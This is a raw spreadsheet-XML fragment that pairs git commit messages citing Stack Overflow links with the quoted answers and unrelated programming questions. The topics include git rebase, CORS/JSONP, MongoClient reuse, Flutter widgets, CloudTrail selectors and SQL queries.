---Added later For Clarity (I hope)---
I should add that I'm willing to re-write this at a later time for better performance and to learn more things, but in order to get this site going in a month or less (in my spare time), I'd like to limit the number of new things I need to learn. I'd LOVE to have the time to learn JavaScript, MVC, maybe a DotNetNuke framework, but from the perspective of a very junior developer and even MORE junior web developer, it's too much all at once.  Baby steps first, and preferably baby steps that will help me in my day-to-day job, since I have plenty of learning to do there too.
</t>
  </si>
  <si>
    <t>C357</t>
  </si>
  <si>
    <t>Add rbC and rbcU variants of rbc / rbcu that reuse the original commit message during the rebase
"git rebase" has no --no-edit or --reuse-message, but it can be emulated by setting the GIT_EDITOR to "true".
Source: https://stackoverflow.com/a/70205254/813602</t>
  </si>
  <si>
    <t>First approach, through Git configuration:
git -c core.editor=true rebase --continue
Or, with environment variables:
GIT_EDITOR=true git rebase --continue
This will override the editor that
git
uses for message confirmation.
true
command simply ends with zero exit code. It makes
git
continue
rebase
as if user closed interactive editor.
On Windows, you would need to
use
CMD /V /C
cmd /V /C "set "GIT_EDITOR=true" &amp;&amp; git rebase --continue
In both OS, you can use aliases
# Linux
alias grc='GIT_EDITOR=true git rebase --continue'
# Windows
doskey grc=cmd /V /C "set "GIT_EDITOR=true" &amp;&amp; git rebase --continue"
Then a simple
grc
will be enough to continue the rebase
without
the editor popping up.
David Gardiner
adds in
the comments
:
In PowerShell, use:
$env:GIT_EDITOR = "true -and git rebase --continue"
then tidy up with
$env:GIT_EDITOR = ""
To set that globally (without alias), maybe consider
this approach
:
specifying the core.commentChar detected from the .git/rebase-merge/message (here @):
git --global core.commentChar @
There is also
GIT_SEQUENCE_EDITOR=:
, but you cannot always leave it at that value, because that would break all the rebase operation where you
want
an editor.
That is why having an alias remains the most flexible and accurate approach, rather than relying on a global setting which might break other rebase editor use cases.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Bruno I have a GET request with a post-response script which is not running properly. If I create an onResponse (res) function there, any code inside it does not execute. Code in the post-response section outside any function executes properly but inside it does not. I think this has to do with the way javascript is implemented in my Bruno. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function onResponse(res) {   
const body = res.getBody();   
console.log(&amp;quot;Response body: &amp;quot;, body);  
} 
console.log(&amp;quot;Test execution in Bruno&amp;quot;);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will output &amp;quot;Test execution in Bruno&amp;quot; and that's it. The request succeeds with the desired response but code in the post-response function does not run. How can I fix this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C358</t>
  </si>
  <si>
    <t>Reuse MCPeerID object
http://stackoverflow.com/a/25801169/434224</t>
  </si>
  <si>
    <t>Discovering your same name twice is because you do "init" the peerID (withDisplayName) each time you init your session.
From apple's documentation, it's a known bug and you should not do so. Rather, save your peerID somewhere (such as NSUserDefaults), and when you init your session, verify if peerID exists, load it, else create/save it.
The simplest code will look like this:
In the init of your session, replace:
_peerID = [[MCPeerID alloc] initWithDisplayName:XXX];
by:
//If there is no PeerID save, create one and save it
if ([[NSUserDefaults standardUserDefaults] dataForKey:@"PeerID"] == nil)
{
    _peerID = [[MCPeerID alloc] initWithDisplayName:XXX];
    [[NSUserDefaults standardUserDefaults] setObject:[NSKeyedArchiver archivedDataWithRootObject:_peerID] forKey:@"PeerID"];
}
//Else, load it
else
{
    _peerID            = [NSKeyedUnarchiver unarchiveObjectWithData:[[NSUserDefaults standardUserDefaults] dataForKey:@"PeerID"]];
}
Of course, you can make a more sophisticated code, such deallocating it and create it from a dynamic variable in case you wanna change name, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">Considering you have an MVVM Architecture in WPF like [external-link]
How would you implement two properties 'synced' that update eachother? I have a Price property, and a PriceVatInclusive property in my model. 
-When the Price changes, I want to see the Vat inclusive price to automatically be 'Price * 1.21'. 
-Vice versa, when the PriceVatInclusive changes, I want the Price to be 'PriceVatInclusive / 1.21'
Any ideas on that?
And what if your model is a Entity framework entiry? You can't use the approach above then... no? Should you put calculating code in the ViewMOdel or ... ?
</t>
  </si>
  <si>
    <t>C359</t>
  </si>
  <si>
    <t>Add a method for formatting human-readable file size
Following the answer of Sridhar Ratnakumar at
https://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size</t>
  </si>
  <si>
    <t>Addressing the above "too small a task to require a library" issue by a straightforward implementation (using f-strings, so Python 3.6+):
def sizeof_fmt(num, suffix="B"):
    for unit in ("", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"):
        if abs(num) &lt; 1024.0:
            return f"{num:3.1f}{unit}{suffix}"
        num /= 1024.0
    return f"{num:.1f}Yi{suffix}"
Supports:
all currently known
binary prefixes
negative and positive numbers
numbers larger than 1000 Yobibytes
arbitrary units (maybe you like to count in Gibibits!)
Example:
&gt;&gt;&gt; sizeof_fmt(168963795964)
'157.4GiB'
by
Fred Cirera</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following code is accepted by g++ (14.2.1):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;vector&amp;gt;
template&amp;lt;typename T&amp;gt;
void foo(T i, std::vector&amp;lt;int&amp;gt; &amp;amp;v = {})
{  }
int main()
{
    std::vector&amp;lt;int&amp;gt; v;
    foo(3, v);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but rejected by clang (19.1.7) with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;non-const lvalue reference to type 'std::vector&amp;lt;int&amp;gt;' cannot bind to an initializer list temporary
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I rely on the default argument (by omitting the 2nd parameter), both compilers reject the code, which makes sense since an attempt is made to bind a non-const lvalue reference to an rvalue.&lt;/p&gt;
&lt;p&gt;Is clang correct by rejecting the code or is g++ correct by accepting the code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C36</t>
  </si>
  <si>
    <t>Adjust the login address to something that is useful for origins outside of the
SpiderOak.com domain, and set it to a private var in the new spideroak
singleton instance.
Refactor the spideroak object definition so it's a singleton instance
framed with Crockford's module singleton pattern.
This all seems proper and operational, *except* that it's currently blocked
from successful XmlHTTPRequests when situated outside of SpiderOak.com due
to cross-domain XHR request restrictions, evidenced by the browser warning
(showing in the javascript debugging console in Chrome):
This stackoverflow answer describes the problem pretty closely:
   http://stackoverflow.com/questions/3595515/xmlhttprequest-error-origin-null-is-not-allowed-by-access-control-allow-origin#answer-3744697
In any case, I'm going to need to get it working from a local file, and
using a jsonP XmlHTTPRequest seems to be the best prospect for doing that.</t>
  </si>
  <si>
    <t>For the record, as far as I can tell, you had two problems:
You weren't passing a "jsonp" type specifier to your $.get, so it was using an ordinary XMLHttpRequest. However, your browser supported CORS (Cross-Origin Resource Sharing) to allow cross-domain XMLHttpRequest if the server OKed it. That's where the Access-Control-Allow-Origin header came in.
I believe you mentioned you were running it from a file:// URL. There are two ways for CORS headers to signal that a cross-domain XHR is OK. One is to send Access-Control-Allow-Origin: * (which, if you were reaching Flickr via $.get, they must have been doing) while the other was to echo back the contents of the Origin header. However, file:// URLs produce a null Origin which can't be authorized via echo-back.
The first was solved in a roundabout way by Darin's suggestion to use $.getJSON. It does a little magic to change the request type from its default of "json" to "jsonp" if it sees the substring callback=? in the URL.
That solved the second by no longer trying to perform a CORS request from a file:// URL.
To clarify for other people, here are the simple troubleshooting instructions:
If you're trying to use JSONP, make sure one of the following is the case:
You're using $.get and set dataType to jsonp.
You're using $.getJSON and included callback=? in the URL.
If you're trying to do a cross-domain XMLHttpRequest via CORS...
Make sure you're testing via http://. Scripts running via file:// have limited support for CORS.
Make sure the browser actually supports CORS. (Opera and Internet Explorer are late to the party)</t>
  </si>
  <si>
    <t>Adjust the login address to something that is useful for origins outs
ide of the
SpiderOak.com domain, and set it to a private var in the new spideroak
singleton instance.
Refactor the spideroak object definition so it's a singleton instance
framed with Crockford's module singleton pattern.
This all seems proper and operational, *except* that it's currently blocked
from successful XmlHTTPRequests when situated outside of SpiderOak.com due
to cross-domain XHR request restrictions, evidenced by the browser warning
(showing in the javascript debugging console in Chrome):
This stackoverflow answer describes the problem pretty closely:
   http://stackoverflow.com/questions/3595515/xmlhttprequest-error-origin-null-is-not-allowed-by-access-control-allow-origin#answer-3744697
In any case, I'm going to need to get it working from a local file, and
using a jsonP XmlHTTPRequest seems to be the best prospect for doing that.</t>
  </si>
  <si>
    <t xml:space="preserve">Every time I create an object that has a collection property I go back and forth on the best way to do it?
public property with a getter that
returns a reference to private variable
explicit get_ObjList and set_ObjList
methods that return and create new or cloned
objects every time
explicit get_ObjList that returns an
IEnumerator and a set_ObjList that
takes IEnumerator
Does it make a difference if the collection is an array (i.e., objList.Clone()) versus a List?
If returning the actual collection as a reference is so bad because it creates dependencies, then why return any property as a reference? Anytime you expose an child object as a reference the internals of that child can be changed without the parent "knowing" unless the child has a property changed event.  Is there a risk for memory leaks?
And, don't options 2 and 3 break serialization? Is this a catch 22 or do you have to implement custom serialization anytime you have a collection property?
The generic ReadOnlyCollection seems like a nice compromise for general use. It wraps an IList and restricts access to it.  Maybe this helps with memory leaks and serialization.  However it still has [external-link] 
Maybe it just depends.  If you don't care that the collection is modified, then just expose it as a public accessor over a private variable per #1. If you don't want other programs to modify the collection then #2 and/or #3 is better.
Implicit in the question is why should one method be used over another and what are the ramifications on security, memory, serialization, etc.?
</t>
  </si>
  <si>
    <t>C360</t>
  </si>
  <si>
    <t>1. modify entity id logic
2. use lazy to reuse mongodb client due to https://stackoverflow.com/questions/33040704/how-should-the-lifecycle-of-mongoclient-work
3. modify repository interface to provide query by path</t>
  </si>
  <si>
    <t>You are using
MongoClient
incorrectly. As indicated in
the docs
It is recommended to store a
MongoClient
instance in a global place,
  either as a static variable or in an IoC container with a singleton
  lifetime.
So you should rework your code to create a singleton
MongoClient
instance and then use that throughout your program.
The reason is that
MongoClient
maintains a pool of open connections that can be shared and reused for best performance.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm curious How do you people think ? (I mean a way of thinking) about design architecture of your Libraries, Systems, Frameworks, etc. before start coding it.
I recently find my self feeling pain in what I've done, and practically every time I want to start everything from scratch..
I do design before, painting some schemes on the paper and imagine how it will work, but maybe I do it in a wrong way ?
For example how do you decide what Interfaces you will need, or how everything will be connected in a best way ? 
(I had a problem some day ago, my friend asked me a library what I've done some time ago, and instead of giving him just one file, I had to give him about 3-4 files, and that's because they're connected in some way.. but not in the right one I think :) so it was my mistake in design..)
</t>
  </si>
  <si>
    <t>C361</t>
  </si>
  <si>
    <t>fix(virtual-background) use a DOM element for storing the image
THis will reuse the previously cached image and obey the base href.
Ref: https://stackoverflow.com/questions/6241716/is-there-a-difference-between-new-image-and-document-createelementimg</t>
  </si>
  <si>
    <t>I couldn't find any detailed reference but based on the comment in the
MDC -
HTMLImageElement
example, it seems that
Image
is part of DOM level 0  whereas
document.createElement
is part of DOM level 2
.
DOM level 0 was invented by Netscape and provided a way to access the certain elements of the website. Basically all browsers support it for backwards compatibility.
But to be honest, I don't understand
why
the
Image
constructor exists there, because, as far as I understood it, there was no way to
manipulate
the document with DOM level 0. Maybe it was only used internally by the browser to create the objects.
DOM level 2 is an official standard developed by the W3C.
For more information about the DOM levels, have a look at at
quirksmode.org - Level 0 DOM
and
Wikipedia
.
I've read somewhere that
Image
,
Form
, and
Element
is called
host objects
, is this true?
Yes.
If it is, what are host objects?
The
ECMAScript specification
motivates host objects this way:
ECMAScript is an object-oriented programming language for performing computations and manipulating computational objects within a host environment. ECMAScript as defined here is not intended to be computationally self-sufficient; indeed, there are no provisions in this specification for input of external data or output of computed results. Instead, it is expected that the computational environment of an ECMAScript program will provide not only the objects and other facilities described in this specification but also certain environment-specific host objects, whose description and behaviour are beyond the scope of this specification except to indicate that they may provide certain properties that can be accessed and certain functions that can be called from an ECMAScript program.
and
host object
object supplied by the host environment to complete the execution environment of ECMAScript.
NOTE     Any object that is not native is a host object.
So any object that is not defined in the specification and provided by the environment is a
host object
. These are for example in a browser (among others):
window
,
document
and
console
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very large dataset (about 10^7 rows and 1000 columns) and need to make cuts into one of the columns, for trining/validation separation, with the bins changing based on another column. I am pretty new to python and am using this function:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;SEGMENT&lt;/code&gt; is either A, B or C, and &lt;code&gt;DATE&lt;/code&gt; is what I am cutting (yes, it is a numerical column, I know it looks terrible but it was not my choice), with different bins for different values of &lt;code&gt;SEGMENT&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cuts = {
    &amp;quot;A&amp;quot;: {&amp;quot;cut&amp;quot;:[0,20240101,20240801,20241201,20250000], &amp;quot;class&amp;quot;:[&amp;quot;out&amp;quot;, &amp;quot;training&amp;quot;, &amp;quot;validation&amp;quot;, &amp;quot;out&amp;quot;]},
    &amp;quot;B&amp;quot;: {&amp;quot;cut&amp;quot;:[0,20230701,20240701,20241201,20250000], &amp;quot;class&amp;quot;:[&amp;quot;out&amp;quot;, &amp;quot;training&amp;quot;, &amp;quot;validation&amp;quot;, &amp;quot;out&amp;quot;]},
    &amp;quot;C&amp;quot;: {&amp;quot;cut&amp;quot;:[0,20230701,20240701,20250101,20250201], &amp;quot;class&amp;quot;:[&amp;quot;out&amp;quot;, &amp;quot;training&amp;quot;, &amp;quot;validation&amp;quot;, &amp;quot;out&amp;quot;]}
}
def divisions(row):
    rules = cuts[row[&amp;quot;SEGMENT&amp;quot;]]
    return pd.cut([row[&amp;quot;DATE&amp;quot;]], bins=rules[&amp;quot;cut&amp;quot;], labels=rules[&amp;quot;class&amp;quot;], right=False, ordered=False)[0]
df[&amp;quot;CLASS&amp;quot;] = df.apply(divisions, axis=1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems to work but has been insanely slow even on samples of less than 0.1% of the actual dataset.&lt;/p&gt;
&lt;p&gt;How can I improve this?&lt;/p&gt;
&lt;p&gt;All I need is this &lt;code&gt;CLASS&lt;/code&gt; column, to check if the training and validation datasets show similar behaviors. I am not yet doing the actual modeling.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C362</t>
  </si>
  <si>
    <t>Randomize staging IP address to allow parallel usages on same machine
VirtualBox restricts IP addresses of host-only networking adapters to
the range 192.168.56.0/21 (see https://stackoverflow.com/q/69722254).
If there is already an IP address from another run, we must reuse that
because it is engraved into a VM snapshot, if any. This is only needed
if the CLI version is the same, as only then the snapshot is used; so
when reading the Vagrantfile, we only need to handle it in the exact
format written by the current CLI version.</t>
  </si>
  <si>
    <t>As of VirtualBox 6.1.28, host-only network adapters are restricted to IPs in the range 192.168.56.0/21 by default (192.168.56.1 -&gt; 192.168.63.254).
You can tell VirtualBox to allow additional IP ranges by configuring
/etc/vbox/networks.conf
. For example, to allow anything in the 10.x.x.x range you could use:
* 10.0.0.0/8
For more info, see the docs at
https://www.virtualbox.org/manual/ch06.html#network_hostonly</t>
  </si>
  <si>
    <t xml:space="preserve">As a side project I'm currently writing a server for an age-old game I used to play. I'm trying to make the server as loosely coupled as possible, but I am wondering what would be a good design decision for multithreading. Currently I have the following sequence of actions:
Startup (creates) -&gt; 
Server (listens for clients, creates) -&gt;
Client (listens for commands and sends period data)
I'm assuming an average of 100 clients, as that was the max at any given time for the game. What would be the right decision as for threading of the whole thing? My current setup is as follows:
1 thread on the server which listens for new connections, on new connection create a client object and start listening again.
Client object has one thread, listening for incoming commands and sending periodic data. This is done using a non-blocking socket, so it simply checks if there's data available, deals with that and then sends messages it has queued. Login is done before the send-receive cycle is started.
One thread (for now) for the game itself, as I consider that to be separate from the whole client-server part, architecturally speaking.
This would result in a total of 102 threads. I am even considering giving the client 2 threads, one for sending and one for receiving. If I do that, I can use blocking I/O on the receiver thread, which means that thread will be mostly idle in an average situation.
My main concern is that by using this many threads I'll be hogging resources. I'm not worried about race conditions or deadlocks, as that's something I'll have to deal with anyway.
My design is setup in such a way that I could use a single thread for all client communications, no matter if it's 1 or 100. I've separated the communications logic from the client object itself, so I could implement it without having to rewrite a lot of code.
The main question is: is it wrong to use over 200 threads in an application? Does it have advantages? I'm thinking about running this on a multi-core machine, would it take a lot of advantage of multiple cores like this? 
Thanks!
Out of all these threads, most of them will be blocked usually. I don't expect connections to be over 5 per minute. Commands from the client will come in infrequently, I'd say 20 per minute on average. 
Going by the answers I get here (the context switching was the performance hit I was thinking about, but I didn't know that until you pointed it out, thanks!) I think I'll go for the approach with one listener, one receiver, one sender, and some miscellaneous stuff ;-)
</t>
  </si>
  <si>
    <t>C363</t>
  </si>
  <si>
    <t>refactor: Refactor reusable widgets from functions to classes
Convert the functions that return reusable widgets to stateless widgets
classes that return these reusable widgets. This is done for the benefits
that classes provide over functions in Flutter.
For more information about the reason of this refactoring, check out the
following link:
https://stackoverflow.com/q/53234825</t>
  </si>
  <si>
    <t>Edit: The Flutter team has now taken an official stance on the matter and stated that classes are preferable. See https://www.youtube.com/watch?v=IOyq-eTRhvo
TL;DR: Prefer using classes over functions to make reusable widget-tree.
EDIT: To make up for some misunderstanding: This is not about functions causing problems, but classes solving some.
Flutter wouldn't have StatelessWidget if a function could do the same thing.
Similarly, it is mainly directed at public widgets, made to be reused. It doesn't matter as much for private functions made to be used only once – although being aware of this behavior is still good.
There is an important difference between using functions instead of classes, that is: The framework is unaware of functions, but can see classes.
Consider the following "widget" function:
Widget functionWidget({ Widget child}) {
  return Container(child: child);
}
used this way:
functionWidget(
  child: functionWidget(),
);
And it's class equivalent:
class ClassWidget extends StatelessWidget {
  final Widget child;
  const ClassWidget({Key key, this.child}) : super(key: key);
  @override
  Widget build(BuildContext context) {
    return Container(
      child: child,
    );
  }
}
used like that:
new ClassWidget(
  child: new ClassWidget(),
);
On paper, both seem to do exactly the same thing: Create 2 Container, with one nested into the other. But the reality is slightly different.
In the case of functions, the generated widget tree looks like this:
Container
  Container
While with classes, the widget tree is:
ClassWidget
  Container
    ClassWidget
      Container
This is important because it changes how the framework behaves when updating a widget.
Why that matters
By using functions to split your widget tree into multiple widgets, you expose yourself to bugs and miss on some performance optimizations.
There is no guarantee that you will have bugs by using functions, but by using classes, you are guaranteed to not face these issues.
Here are a few interactive examples on Dartpad that you can run yourself to better understand the issues:
https://dartpad.dev/?id=bcae5878ccced764b35dd9a659a593dbThis example showcases how by splitting your app into functions, you may accidentally break things like AnimatedSwitcher
https://dartpad.dev/?id=481a2c301c2e4bed6c30ba651d01bacb This example showcases how classes allow more granular rebuilds of the widget tree, improving performances
https://dartpad.dev/?id=8bcb85ba535102bed652e5bf1540ac3b This example showcases how, by using functions, you expose yourself to misusing BuildContext and facing bugs when using InheritedWidgets (such as Theme or providers)
Conclusion
Here's a curated list of the differences between using functions and classes:
Classes:
allow performance optimization (const constructor, more granular rebuild)
ensure that switching between two different layouts correctly disposes of the resources (functions may reuse some previous state)
ensures that hot-reload works properly (using functions could break hot-reload for showDialogs &amp; similar)
are integrated into the widget inspector.
We see ClassWidget in the widget-tree showed by the devtool, which helps understanding what is on screen
We can override debugFillProperties to print what the parameters passed to a widget are
better error messagesIf an exception happens (like ProviderNotFound), the framework will give you the name of the currently building widget. If you've split your widget tree only in functions + Builder, your errors won't have a helpful name
can define keys
can use the context API
Functions:
have less code (which can be solved using code-generation functional_widget)
Overall, it is considered a bad practice to use functions over classes for reusing widgets because of these reasons.You can, but it may bite you in the future.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on optimizing a query for a dataset with 14 columns and 6.6 million rows, and Iâ€™d love to get your thoughts on which approach is better in terms of efficiency, clarity and maintainability.
Iâ€™ve got two versions of the query, and while both work, Iâ€™m curious to hear your opinions on which one youâ€™d prefer and why.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The goal of the queries&lt;/strong&gt; is to retrieve the top 3 most requested services based on the request count for each season.&lt;/p&gt;
&lt;p&gt;In terms of performance the sub-query took &lt;em&gt;&lt;strong&gt;1m33s&lt;/strong&gt;&lt;/em&gt; to execute, the &lt;em&gt;&lt;strong&gt;CTE&lt;/strong&gt;&lt;/em&gt; one took &lt;em&gt;&lt;strong&gt;1m24s&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;QUERY 1: Using Sub-Query&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT season, service_name, request_count
FROM (
    SELECT season, service_name, COUNT(*) AS request_count,
           ROW_NUMBER() OVER (PARTITION BY season ORDER BY COUNT(*) DESC) AS row_num
    FROM service_requests_clean_v3
    GROUP BY season, service_name
) AS ranked_requests
WHERE row_num IN (1,2,3)
ORDER BY season;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;QUERY 2: Using a CTE&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WITH ranked_requests AS (
    SELECT season, service_name, COUNT(*) AS request_count
    FROM service_requests_clean_v3
    GROUP BY season, service_name
),
top_requests AS (
    SELECT season, service_name, request_count,
           ROW_NUMBER() OVER (PARTITION BY season ORDER BY request_count DESC) AS row_num
    FROM ranked_requests
)
SELECT season, service_name, request_count
FROM top_requests
WHERE row_num IN (1,2,3)
ORDER BY season;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Below a sample of the data:&lt;/p&gt;
&lt;div class="s-table-container"&gt;&lt;table class="s-table"&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;service_request_id&lt;/th&gt;
&lt;th&gt;requested_date&lt;/th&gt;
&lt;th&gt;updated_date&lt;/th&gt;
&lt;th&gt;closed_date&lt;/th&gt;
&lt;th&gt;status_description&lt;/th&gt;
&lt;th&gt;source&lt;/th&gt;
&lt;th&gt;service_name&lt;/th&gt;
&lt;th&gt;agency_responsible&lt;/th&gt;
&lt;th&gt;comm_code&lt;/th&gt;
&lt;th&gt;comm_name&lt;/th&gt;
&lt;th&gt;longitude&lt;/th&gt;
&lt;th&gt;latitude&lt;/th&gt;
&lt;th&gt;point&lt;/th&gt;
&lt;th&gt;season&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;21-00609175&lt;/td&gt;
&lt;td&gt;2021-08-17 0:00&lt;/td&gt;
&lt;td&gt;2021-08-19 0:00&lt;/td&gt;
&lt;td&gt;2021-08-19 0:00&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;Phone&lt;/td&gt;
&lt;td&gt;CBS Inspection - Electrical&lt;/td&gt;
&lt;td&gt;PD - Calgary Building Services&lt;/td&gt;
&lt;td&gt;HAR&lt;/td&gt;
&lt;td&gt;HARVEST HILLS&lt;/td&gt;
&lt;td&gt;-114.052778&lt;/td&gt;
&lt;td&gt;51.14767759&lt;/td&gt;
&lt;td&gt;POINT (-114.052777977324 51.14767758603)&lt;/td&gt;
&lt;td&gt;Summer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;21-00609171&lt;/td&gt;
&lt;td&gt;2021-08-17 0:00&lt;/td&gt;
&lt;td&gt;2021-08-19 0:00&lt;/td&gt;
&lt;td&gt;2021-08-19 0:00&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;Phone&lt;/td&gt;
&lt;td&gt;Bylaw - Noise Concerns&lt;/td&gt;
&lt;td&gt;CS - Calgary Community Standards&lt;/td&gt;
&lt;td&gt;BLN&lt;/td&gt;
&lt;td&gt;BELTLINE&lt;/td&gt;
&lt;td&gt;-114.0551888&lt;/td&gt;
&lt;td&gt;51.03743793&lt;/td&gt;
&lt;td&gt;POINT (-114.055188797256 51.037437926217)&lt;/td&gt;
&lt;td&gt;Summer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18-01094780&lt;/td&gt;
&lt;td&gt;2018-11-12 0:00&lt;/td&gt;
&lt;td&gt;2020-06-24 0:00&lt;/td&gt;
&lt;td&gt;2020-06-24 0:00&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;App&lt;/td&gt;
&lt;td&gt;Roads - Traffic Signal Timing Inquiry&lt;/td&gt;
&lt;td&gt;TRAN - Roads&lt;/td&gt;
&lt;td&gt;DAL&lt;/td&gt;
&lt;td&gt;DALHOUSIE&lt;/td&gt;
&lt;td&gt;-114.1581646&lt;/td&gt;
&lt;td&gt;51.10941383&lt;/td&gt;
&lt;td&gt;POINT (-114.158164615208 51.109413833961)&lt;/td&gt;
&lt;td&gt;Fall&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18-01017964&lt;/td&gt;
&lt;td&gt;2018-10-17 0:00&lt;/td&gt;
&lt;td&gt;2020-06-24 0:00&lt;/td&gt;
&lt;td&gt;2020-06-24 0:00&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;Phone&lt;/td&gt;
&lt;td&gt;Roads - Traffic Signal Timing Inquiry&lt;/td&gt;
&lt;td&gt;TRAN - Roads&lt;/td&gt;
&lt;td&gt;SHN&lt;/td&gt;
&lt;td&gt;SHAWNESSY&lt;/td&gt;
&lt;td&gt;-114.0737568&lt;/td&gt;
&lt;td&gt;50.90330333&lt;/td&gt;
&lt;td&gt;POINT (-114.073756821499 50.903303329478)&lt;/td&gt;
&lt;td&gt;Fall&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18-00948852&lt;/td&gt;
&lt;td&gt;2018-09-25 0:00&lt;/td&gt;
&lt;td&gt;2021-02-04 0:00&lt;/td&gt;
&lt;td&gt;2021-02-04 0:00&lt;/td&gt;
&lt;td&gt;Closed&lt;/td&gt;
&lt;td&gt;Phone&lt;/td&gt;
&lt;td&gt;Roads - Debris on Street/Sidewalk/Boulevard&lt;/td&gt;
&lt;td&gt;TRAN - Roads&lt;/td&gt;
&lt;td&gt;ALB&lt;/td&gt;
&lt;td&gt;ALBERT PARK/RADISSON HEIGHTS&lt;/td&gt;
&lt;td&gt;-113.9967838&lt;/td&gt;
&lt;td&gt;51.04454101&lt;/td&gt;
&lt;td&gt;POINT (-113.996783821473 51.044541013835)&lt;/td&gt;
&lt;td&gt;Fall&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Found a way to optimize the performance of the queries by adding an index:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE INDEX idx_season_service_name ON service_requests_clean_v3 (season, service_name);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Running the same queries after creating the index had a big impact on the one using the CTE, time dropped to 14s, almost no change for the sub-query one.&lt;/p&gt;
&lt;p&gt;To double check the result, I updated the table by creating a &lt;code&gt;month_requested&lt;/code&gt; column and indexing it as well&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER TABLE service_requests_clean_v3
ADD COLUMN month_requested VARCHAR(20);
UPDATE service_requests_clean_v3
SET month_requested = MONTHNAME(requested_date);
CREATE INDEX idx_month_requested_service_name ON service_requests_clean_v3 (month_requested, service_name);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using th same type of queries but this time Grouping and Ordering By month, the index had the exact same results.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CONCLUSION FOR THIS SCENARIO :&lt;/strong&gt;
With an index, the CTE query is clearer and way more faster.&lt;/p&gt;
&lt;p&gt;Looking forward to your insights!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C364</t>
  </si>
  <si>
    <t>fix: Reuse CloudTrail trail between runs (#1477)
Based on &lt;https://stackoverflow.com/a/71468129/96588&gt;.
Had to rename the log group name because only resources with a "retain"
deletion policy can be moved between stacks
&lt;https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide
/refactor-stacks.html&gt;.</t>
  </si>
  <si>
    <t>CloudTrail has
Advanced Event Selectors
like
EndsWith
to filter ARNs. This fits your use case, where you want a shared Trail for all Lambda ARNs ending with
import-status
.
OK, but how do you set Advanced Event Selectors with the CDK? Unfortunately, the CloudFormation
AWS::CloudTrail::Trail
resource (= CDK L1
CfnTrail
construct, which underlies the L2
Trail
) appears not to support them in the
eventSelectors
prop. Fortunately, CDK (and CloudFormation) has
Custom Resources
to plug such gaps.
In your new
trail_stack
, create a Trail and a
AWSCustomResource
construct, which makes arbitrary SDK calls.  It will call the
PutEventsSelectors
API on your Trail, setting the Advanced Event Selectors.  It will be called once, on resource create:
# trail_stack.py
aws_custom = cr.AwsCustomResource(self, "aws-custom-advanced-selectors",
    on_create=cr.AwsSdkCall(
        service="CloudTrail",
        action="putEventSelectors",
        parameters= parameters: {
          TrailName: my_trail.trail_arn,
          AdvancedEventSelectors: [
            {
              Name: 'Log import-status lambdas only',
              FieldSelectors: [
                { Field: 'eventCategory', Equals: ['Data'] },
                { Field: 'resources.type', Equals: ['AWS::Lambda::Function'] },
                {
                  Field: 'resources.ARN',
                  EndsWith: ['import-status'],
                },
              ],
            },
          ],
        },
        physical_resource_id=cr.PhysicalResourceId.of("aws-custom-advanced-selectors")
    ),
    policy=cr.AwsCustomResourcePolicy.from_sdk_calls(
        resources=my_trail.trail_arn
    )
)</t>
  </si>
  <si>
    <t xml:space="preserve">When your domain layer or business layer (whatever you want to call it) is completely separate from your UI, how does it gather the information it needs to complete a request?
For example, suppose the UI issues a request to add a line to a purchase order, and the business rules determine that you need an authorization code for some reason.  How does the domain layer communicate this back?  Return some kind of response code indicating it requires authorization?  Fire a "need authorization" event and see if anyone responds?  Accept some sort of IAuthorizationProvider that the UI will implement?
